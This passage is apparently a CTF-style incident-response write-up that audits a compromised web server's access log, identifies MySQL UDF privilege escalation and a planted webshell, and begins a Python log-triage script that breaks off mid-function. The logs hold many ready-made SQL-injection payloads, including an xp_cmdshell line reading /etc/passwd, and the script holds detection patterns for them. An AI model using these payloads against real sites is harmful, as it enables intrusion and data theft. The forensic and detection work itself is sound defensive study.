I started the container right before getting off work; with dinner and other interruptions I looked at it on and off and had to renew the container once (coins: -40 O.o)
The challenge really isn't hard. Coincidentally, just a few days ago we held an attack/defense drill on intrusion detection and tracing, so this was a good chance to consolidate what I'd learned. See the article I posted two days ago for details.

image-20221031144859374.png

image-20221031120938204.png

Quick analysis:

Windows Server 2008: connecting over remote desktop lands you right on the log page; download the log and audit it.
As I recall there were tens of thousands of lines at first; after removing distractors and other useless entries, not much was left [filter with a regular expression; useless lines look like: ^.\ 404.\r\n]
(the content below is the result after partial decoding):

27.211.48.24 - - [28/Oct/2022:15:58:28  0800] "GET /plus/heightsearch.php?id=1&pxQG=5478 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')# HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:29  0800] "GET /plus/heightsearch.php?id=1 HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:30  0800] "GET /plus/heightsearch.php?id=2369 HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:31  0800] "GET /plus/heightsearch.php?id=1.,).((.("' HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:33  0800] "GET /plus/heightsearch.php?id=1'MLEFkj<'">dHUPNQ HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:34  0800] "GET /plus/heightsearch.php?id=1) AND 5781=2799 AND (5691=5691 HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:35  0800] "GET /plus/heightsearch.php?id=1 AND 3672=5261 HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:36  0800] "GET /plus/heightsearch.php?id=1 AND 9767=3709-- zyNq HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:37  0800] "GET /plus/heightsearch.php?id=1') AND 9002=1777 AND ('brjY'='brjY HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:38  0800] "GET /plus/heightsearch.php?id=1' AND 7532=6334 AND 'vZrw'='vZrw HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:40  0800] "GET /plus/heightsearch.php?id=(SELECT (CASE WHEN (2459=2287) THEN 1 ELSE (SELECT 2287 UNION SELECT 4790) END)) HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:41  0800] "GET /plus/heightsearch.php?id=1) AND EXTRACTVALUE(3322,CONCAT(0x5c,0x717a767871,(SELECT (ELT(3322=3322,1))),0x717a706271)) AND (3142=3142 HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:42  0800] "GET /plus/heightsearch.php?id=1 AND EXTRACTVALUE(3322,CONCAT(0x5c,0x717a767871,(SELECT (ELT(3322=3322,1))),0x717a706271)) HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:43  0800] "GET /plus/heightsearch.php?id=1 AND EXTRACTVALUE(3322,CONCAT(0x5c,0x717a767871,(SELECT (ELT(3322=3322,1))),0x717a706271))-- ITyG HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:44  0800] "GET /plus/heightsearch.php?id=1') AND EXTRACTVALUE(3322,CONCAT(0x5c,0x717a767871,(SELECT (ELT(3322=3322,1))),0x717a706271)) AND ('RzfU'='RzfU HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:45  0800] "GET /plus/heightsearch.php?id=1' AND EXTRACTVALUE(3322,CONCAT(0x5c,0x717a767871,(SELECT (ELT(3322=3322,1))),0x717a706271)) AND 'eana'='eana HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:46  0800] "GET /plus/heightsearch.php?id=1) AND 8827=CAST((CHR(113)||CHR(122)||CHR(118)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (8827=8827) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(112)||CHR(98)||CHR(113)) AS NUMERIC) AND (1441=1441 HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:47  0800] "GET /plus/heightsearch.php?id=1 AND 8827=CAST((CHR(113)||CHR(122)||CHR(118)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (8827=8827) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(112)||CHR(98)||CHR(113)) AS NUMERIC) HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:48  0800] "GET /plus/heightsearch.php?id=1 AND 8827=CAST((CHR(113)||CHR(122)||CHR(118)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (8827=8827) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(112)||CHR(98)||CHR(113)) AS NUMERIC)-- xSlg HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:49  0800] "GET /plus/heightsearch.php?id=1') AND 8827=CAST((CHR(113)||CHR(122)||CHR(118)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (8827=8827) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(112)||CHR(98)||CHR(113)) AS NUMERIC) AND ('RaFv'='RaFv HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:50  0800] "GET /plus/heightsearch.php?id=1' AND 8827=CAST((CHR(113)||CHR(122)||CHR(118)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (8827=8827) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(112)||CHR(98)||CHR(113)) AS NUMERIC) AND 'dNIk'='dNIk HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:51  0800] "GET /plus/heightsearch.php?id=1) AND 3876 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(118)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3876=3876) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(98)+CHAR(113))) AND (2092=2092 HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:52  0800] "GET /plus/heightsearch.php?id=1 AND 3876 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(118)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3876=3876) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(98)+CHAR(113))) HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:54  0800] "GET /plus/heightsearch.php?id=1 AND 3876 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(118)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3876=3876) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(98)+CHAR(113)))-- oAju HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:55  0800] "GET /plus/heightsearch.php?id=1') AND 3876 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(118)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3876=3876) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(98)+CHAR(113))) AND ('QzDG'='QzDG HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:56  0800] "GET /plus/heightsearch.php?id=1' AND 3876 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(118)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3876=3876) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(98)+CHAR(113))) AND 'phJm'='phJm HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:57  0800] "GET /plus/heightsearch.php?id=1) AND 1072=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(118)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (1072=1072) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(112)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND (8197=8197 HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:58  0800] "GET /plus/heightsearch.php?id=1 AND 1072=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(118)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (1072=1072) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(112)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:59  0800] "GET /plus/heightsearch.php?id=1 AND 1072=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(118)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (1072=1072) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(112)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL)-- mkQK HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:00  0800] "GET /plus/heightsearch.php?id=1') AND 1072=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(118)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (1072=1072) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(112)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND ('eGrM'='eGrM HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:01  0800] "GET /plus/heightsearch.php?id=1' AND 1072=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||,CHR(113)||CHR(122)||CHR(118)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (1072=1072) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(112)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND 'NDia'='NDia HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:02  0800] "GET /plus/heightsearch.php?id=(SELECT CONCAT(CONCAT('qzvxq',(CASE WHEN (5011=5011) THEN '1' ELSE '0' END)),'qzpbq')) HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:03  0800] "GET /plus/heightsearch.php?id=1);SELECT PG_SLEEP(5)-- HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:05  0800] "GET /plus/heightsearch.php?id=1;SELECT PG_SLEEP(5)-- HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:06  0800] "GET /plus/heightsearch.php?id=1');SELECT PG_SLEEP(5)-- HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:07  0800] "GET /plus/heightsearch.php?id=1';SELECT PG_SLEEP(5)-- HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:08  0800] "GET /plus/heightsearch.php?id=1);WAITFOR DELAY '0:0:5'-- HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:09  0800] "GET /plus/heightsearch.php?id=1;WAITFOR DELAY '0:0:5'-- HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:10  0800] "GET /plus/heightsearch.php?id=1');WAITFOR DELAY '0:0:5'-- HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:11  0800] "GET /plus/heightsearch.php?id=1';WAITFOR DELAY '0:0:5'-- HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:12  0800] "GET /plus/heightsearch.php?id=1);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(75)||CHR(65)||CHR(119),5) FROM DUAL-- HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:13  0800] "GET /plus/heightsearch.php?id=1;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(75)||CHR(65)||CHR(119),5) FROM DUAL-- HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:14  0800] "GET /plus/heightsearch.php?id=1');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(75)||CHR(65)||CHR(119),5) FROM DUAL-- HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:16  0800] "GET /plus/heightsearch.php?id=1';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(75)||CHR(65)||CHR(119),5) FROM DUAL-- HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:17  0800] "GET /plus/heightsearch.php?id=1) AND (SELECT 7966 FROM (SELECT(SLEEP(5)))wfKw) AND (4680=4680 HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:18  0800] "GET /plus/heightsearch.php?id=1 AND (SELECT 7966 FROM (SELECT(SLEEP(5)))wfKw) HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:19  0800] "GET /plus/heightsearch.php?id=1 AND (SELECT 7966 FROM (SELECT(SLEEP(5)))wfKw)-- AOVF HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:20  0800] "GET /plus/heightsearch.php?id=1') AND (SELECT 7966 FROM (SELECT(SLEEP(5)))wfKw) AND ('BomC'='BomC HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:21  0800] "GET /plus/heightsearch.php?id=1' AND (SELECT 7966 FROM (SELECT(SLEEP(5)))wfKw) AND 'wPfG'='wPfG HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:22  0800] "GET /plus/heightsearch.php?id=1) AND 6299=(SELECT 6299 FROM PG_SLEEP(5)) AND (9547=9547 HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:23  0800] "GET /plus/heightsearch.php?id=1 AND 6299=(SELECT 6299 FROM PG_SLEEP(5)) HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:24  0800] "GET /plus/heightsearch.php?id=1 AND 6299=(SELECT 6299 FROM PG_SLEEP(5))-- LNPn HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:25  0800] "GET /plus/heightsearch.php?id=1') AND 6299=(SELECT 6299 FROM PG_SLEEP(5)) AND ('BFqo'='BFqo HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:26  0800] "GET /plus/heightsearch.php?id=1' AND 6299=(SELECT 6299 FROM PG_SLEEP(5)) AND 'POQt'='POQt HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:28  0800] "GET /plus/heightsearch.php?id=1) WAITFOR DELAY '0:0:5' AND (3312=3312 HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:29  0800] "GET /plus/heightsearch.php?id=1 WAITFOR DELAY '0:0:5' HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:30  0800] "GET /plus/heightsearch.php?id=1 WAITFOR DELAY '0:0:5'-- GIsp HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:31  0800] "GET /plus/heightsearch.php?id=1') WAITFOR DELAY '0:0:5' AND ('GXdI'='GXdI HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:32  0800] "GET /plus/heightsearch.php?id=1' WAITFOR DELAY '0:0:5' AND 'cEsi'='cEsi HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:33  0800] "GET /plus/heightsearch.php?id=1) AND 6955=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(106)||CHR(101)||CHR(119),5) AND (4495=4495 HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:34  0800] "GET /plus/heightsearch.php?id=1 AND 6955=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(106)||CHR(101)||CHR(119),5) HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:35  0800] "GET /plus/heightsearch.php?id=1 AND 6955=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(106)||CHR(101)||CHR(119),5)-- FkRl HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:36  0800] "GET /plus/heightsearch.php?id=1') AND 6955=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(106)||CHR(101)||CHR(119),5) AND ('uJJt'='uJJt HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:38  0800] "GET /plus/heightsearch.php?id=1' AND 6955=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(106)||CHR(101)||CHR(119),5) AND 'dXfX'='dXfX HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:46  0800] "GET /plus/heightsearch.php?id=1) ORDER BY 1-- kvLj HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:47  0800] "GET /plus/heightsearch.php?id=1) ORDER BY 5868-- laxD HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:48  0800] "GET /plus/heightsearch.php?id=1 ORDER BY 1-- iVOA HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:49  0800] "GET /plus/heightsearch.php?id=1 ORDER BY 9598-- nEAK HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:50  0800] "GET /plus/heightsearch.php?id=1 ORDER BY 1-- fsXM HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:51  0800] "GET /plus/heightsearch.php?id=1 ORDER BY 9394-- dkzK HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:52  0800] "GET /plus/heightsearch.php?id=1') ORDER BY 1-- bwKD HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:54  0800] "GET /plus/heightsearch.php?id=1') ORDER BY 6418-- CpUZ HTTP/1.1" 200 5899

You can clearly see there is SQL injection; I only skimmed it and did not look at it in detail.
Now on to the challenge questions:

Privilege escalation method (enter the hacker's privilege escalation method; letters in lowercase):

It is obvious from the start that MySQL was used in the attack, but I only confirmed it was MySQL UDF privilege escalation later, when I saw the files;

image-20221031131124075.png

The hacker's webshell (delete the webshell the hacker uploaded)

Attacks usually write a shell. Looking at the log, there are a lot of POST requests here; in the middle I found a GET request to a new file, guessed it was a newly written trojan, checked it, and it was indeed a webshell.

27.211.48.24 - - [28/Oct/2022:16:12:33 +0800] "POST /phpmyadmin/db_sql_autocomplete.php HTTP/1.1" 200 2247
27.211.48.24 - - [28/Oct/2022:16:12:34 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 28
27.211.48.24 - - [28/Oct/2022:16:13:41 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 28
27.211.48.24 - - [28/Oct/2022:16:13:42 +0800] "POST /phpmyadmin/import.php HTTP/1.1" 200 1705
27.211.48.24 - - [28/Oct/2022:16:14:01 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 28
27.211.48.24 - - [28/Oct/2022:16:14:02 +0800] "POST /phpmyadmin/import.php HTTP/1.1" 200 2744
27.211.48.24 - - [28/Oct/2022:16:19:39 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 273
27.211.48.24 - - [28/Oct/2022:16:19:40 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 284
27.211.48.24 - - [28/Oct/2022:16:19:45 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 295
27.211.48.24 - - [28/Oct/2022:16:19:46 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 306
27.211.48.24 - - [28/Oct/2022:16:19:47 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 316
27.211.48.24 - - [28/Oct/2022:16:19:48 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 338
27.211.48.24 - - [28/Oct/2022:16:19:50 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 350
27.211.48.24 - - [28/Oct/2022:16:19:52 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 351
27.211.48.24 - - [28/Oct/2022:16:19:54 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 353
27.211.48.24 - - [28/Oct/2022:16:19:55 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 361
27.211.48.24 - - [28/Oct/2022:16:24:27 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 361
27.211.48.24 - - [28/Oct/2022:16:24:29 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 211
27.211.48.24 - - [28/Oct/2022:16:24:29 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 211
27.211.48.24 - - [28/Oct/2022:16:24:30 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 211
27.211.48.24 - - [28/Oct/2022:16:24:31 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 149
27.211.48.24 - - [28/Oct/2022:16:24:34 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 28
27.211.48.24 - - [28/Oct/2022:16:24:45 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 264
27.211.48.24 - - [28/Oct/2022:16:25:02 +0800] "POST /phpmyadmin/import.php HTTP/1.1" 200 727
27.211.48.24 - - [28/Oct/2022:16:25:35 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 511
27.211.48.24 - - [28/Oct/2022:16:25:38 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 223
27.211.48.24 - - [28/Oct/2022:16:25:39 +0800] "POST /phpmyadmin/import.php HTTP/1.1" 200 680
27.211.48.24 - - [28/Oct/2022:16:26:09 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 511
27.211.48.24 - - [28/Oct/2022:16:26:10 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 527
27.211.48.24 - - [28/Oct/2022:16:26:11 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 264
27.211.48.24 - - [28/Oct/2022:16:26:45 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 28
27.211.48.24 - - [28/Oct/2022:16:26:58 +0800] "POST /phpmyadmin/import.php HTTP/1.1" 200 3824
27.211.48.24 - - [28/Oct/2022:16:28:32 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 28
27.211.48.24 - - [28/Oct/2022:16:28:33 +0800] "POST /phpmyadmin/import.php HTTP/1.1" 200 2775
27.211.48.24 - - [28/Oct/2022:16:29:15 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 184
27.211.48.24 - - [28/Oct/2022:16:29:35 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 184
27.211.48.24 - - [28/Oct/2022:16:29:37 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 184
27.211.48.24 - - [28/Oct/2022:16:29:38 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 184
27.211.48.24 - - [28/Oct/2022:16:29:39 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 184
27.211.48.24 - - [28/Oct/2022:16:29:40 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 184
27.211.48.24 - - [28/Oct/2022:16:29:41 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 184
27.211.48.24 - - [28/Oct/2022:16:29:42 +0800] "POST /phpmyadmin/import.php HTTP/1.1" 200 13839
27.211.48.24 - - [28/Oct/2022:16:29:59 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 163
27.211.48.24 - - [28/Oct/2022:16:30:00 +0800] "POST /phpmyadmin/import.php HTTP/1.1" 200 1760
27.211.48.24 - - [28/Oct/2022:16:30:12 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 28
27.211.48.24 - - [28/Oct/2022:16:30:13 +0800] "POST /phpmyadmin/import.php HTTP/1.1" 200 3360
27.211.48.24 - - [28/Oct/2022:16:30:21 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 28
27.211.48.24 - - [28/Oct/2022:16:30:22 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 28
27.211.48.24 - - [28/Oct/2022:16:30:23 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 28
27.211.48.24 - - [28/Oct/2022:16:30:25 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 28
27.211.48.24 - - [28/Oct/2022:16:30:27 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 28
27.211.48.24 - - [28/Oct/2022:16:30:28 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 28
27.211.48.24 - - [28/Oct/2022:16:30:30 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 28
27.211.48.24 - - [28/Oct/2022:16:30:31 +0800] "POST /phpmyadmin/import.php HTTP/1.1" 200 3406
27.211.48.24 - - [28/Oct/2022:16:31:44 +0800] "POST /phpmyadmin/import.php HTTP/1.1" 200 3399
27.211.48.24 - - [28/Oct/2022:16:32:04 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 28
27.211.48.24 - - [28/Oct/2022:16:32:06 +0800] "POST /phpmyadmin/lint.php HTTP/1.1" 200 28
27.211.48.24 - - [28/Oct/2022:16:32:07 +0800] "POST /phpmyadmin/import.php HTTP/1.1" 200 3413
27.211.48.24 - - [28/Oct/2022:16:36:27 +0800] "POST /phpmyadmin/index.php HTTP/1.1" 200 1306
27.211.48.24 - - [28/Oct/2022:16:42:27 +0800] "GET /dede/inc/config_sys.php HTTP/1.1" 200 -
27.211.48.24 - - [28/Oct/2022:16:43:06 +0800] "POST /dede/inc/config_sys.php HTTP/1.1" 200 -
27.211.48.24 - - [28/Oct/2022:16:43:09 +0800] "POST /dede/inc/config_sys.php HTTP/1.1" 200 -
27.211.48.24 - - [28/Oct/2022:16:43:28 +0800] "-" 408 -
27.211.48.24 - - [28/Oct/2022:16:45:10 +0800] "POST /dede/inc/config_sys.php HTTP/1.1" 200 -
27.211.48.24 - - [28/Oct/2022:16:45:13 +0800] "POST /dede/inc/config_sys.php HTTP/1.1" 200 -

A quick look tells you which one is the trojan; just delete it.
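The triage the writeup does by hand (dropping 404 noise with a regex, spotting the SQL-injection probes, and picking out the new file that is fetched with GET and then POSTed to in the middle of the phpMyAdmin traffic) can be scripted. The following Python is an added example, not code from the original post: the log lines inside it are constructed samples modelled on a few of the entries above, the indicator names are my own, and `webshell_candidates` encodes the author's reasoning as a stated assumption rather than a general rule.

```python
"""Access-log triage in the style of the writeup: drop 404 noise, flag SQL-injection
probes and surface a newly dropped file that is fetched with GET and then POSTed to.
Added example, not code from the original post."""
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample modelled on a few lines of the writeup's log (not the full log).
SAMPLE_LOG = """\
27.211.48.24 - - [28/Oct/2022:15:58:28 +0800] "GET /plus/heightsearch.php?id=1%20AND%201=1%20UNION%20ALL%20SELECT%201,NULL HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:58:33 +0800] "GET /plus/heightsearch.php?id=1'MLEFkj<'">dHUPNQ HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:17 +0800] "GET /plus/heightsearch.php?id=1) AND (SELECT 7966 FROM (SELECT(SLEEP(5)))wfKw) AND (4680=4680 HTTP/1.1" 200 5899
27.211.48.24 - - [28/Oct/2022:15:59:46 +0800] "GET /plus/heightsearch.php?id=1) ORDER BY 1-- kvLj HTTP/1.1" 200 5899
10.0.0.5 - - [28/Oct/2022:16:00:01 +0800] "GET /favicon.ico HTTP/1.1" 404 209
10.0.0.5 - - [28/Oct/2022:16:00:02 +0800] "GET /index.php HTTP/1.1" 200 8811
27.211.48.24 - - [28/Oct/2022:16:12:33 +0800] "POST /phpmyadmin/db_sql_autocomplete.php HTTP/1.1" 200 2247
27.211.48.24 - - [28/Oct/2022:16:29:42 +0800] "POST /phpmyadmin/import.php HTTP/1.1" 200 13839
27.211.48.24 - - [28/Oct/2022:16:42:27 +0800] "GET /dede/inc/config_sys.php HTTP/1.1" 200 -
27.211.48.24 - - [28/Oct/2022:16:43:06 +0800] "POST /dede/inc/config_sys.php HTTP/1.1" 200 -
27.211.48.24 - - [28/Oct/2022:16:43:28 +0800] "-" 408 -
"""

# Common log format; the request field is matched greedily because a decoded
# request line (as in the writeup) may itself contain quotes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>.*)" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Indicator name -> pattern, checked in this order on the URL-decoded, upper-cased query.
INDICATORS = [
    ("TAUTOLOGY", re.compile(r"\bAND\s*\(?\d+\s*=\s*\d+")),
    ("UNION_SELECT", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b")),
    ("TIME_DELAY", re.compile(r"\bSLEEP\(|\bPG_SLEEP\b|\bWAITFOR\s+DELAY\b|DBMS_PIPE\.RECEIVE_MESSAGE")),
    ("ERROR_BASED", re.compile(r"\bEXTRACTVALUE\(|\bUPDATEXML\(|\bXMLTYPE\(")),
    ("ORDER_BY", re.compile(r"\bORDER\s+BY\s+\d+")),
    ("OS_COMMAND", re.compile(r"\bXP_CMDSHELL\b")),
    ("QUOTE_PROBE", re.compile("['\"]")),
]


def parse_line(line):
    """Split one access-log line into its fields; None if it is not a log line."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    parts = m.group("req").split(" ")
    method = parts[0]
    # "METHOD target HTTP/x": the target may contain spaces once decoded, so
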